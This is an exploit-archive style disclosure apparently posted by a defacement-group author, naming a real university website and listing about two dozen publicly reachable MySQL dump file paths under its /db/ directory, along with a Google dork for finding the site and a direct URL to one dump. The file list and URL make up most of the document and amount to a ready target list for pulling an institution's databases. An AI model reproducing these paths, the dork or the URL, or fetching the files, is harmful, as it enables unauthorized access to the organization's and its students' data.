############################################################################################ # Exploit Title : Independent University of Bangladesh IUB Database Disclosure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 22/03/2019 # Vendor Homepage : slass.iub.edu.bd # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : Slass Independent University Bangladesh This Site is designed and maintained by CITS Web Development Team site:iub.edu.bd # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-538 [ File and Directory Information Exposure ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ############################################################################################ # Impact : *********** * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. ############################################################################################ # Database Disclosure Exploit and Informations : ******************************************* /db/aids.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: aids -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/bli_wordpress.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: bli_wordpress -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/cfp.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: cfp -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/cse.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: cse -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/cssr.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: cssr -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/eee.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: eee -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/englishnew.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: englishnew -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/iub.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: iub -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/iubmain.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: iubmain -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jblidb.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jblidb -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jchpddb.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jchpddb -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jmdemdb.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jmdemdb -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jmdosa.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jmdosa -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jmlanguage.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jmlanguage -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jmsemdb.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jmsemdb -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jscgp.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jscgp -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jsdlaw.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jsdlaw -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jsdmcom.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jsdmcom -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jsdsscience.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jsdsscience -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jsenglish.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jsenglish -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jsesmdb.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jsesmdb -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jsesmdb.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jsesmdb -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/jslassdb.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: jslassdb -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/onlineapp.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: onlineapp -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/sls.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: sls -- ------------------------------------------------------ -- Server version 5.1.72-2 /db/wpdosa.sql -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: wpdosa -- ------------------------------------------------------ -- Server version 5.1.72-2 ############################################################################################ # Example Vulnerable Site : ************************* [+] slass.iub.edu.bd/db/iub.sql ############################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ############################################################################################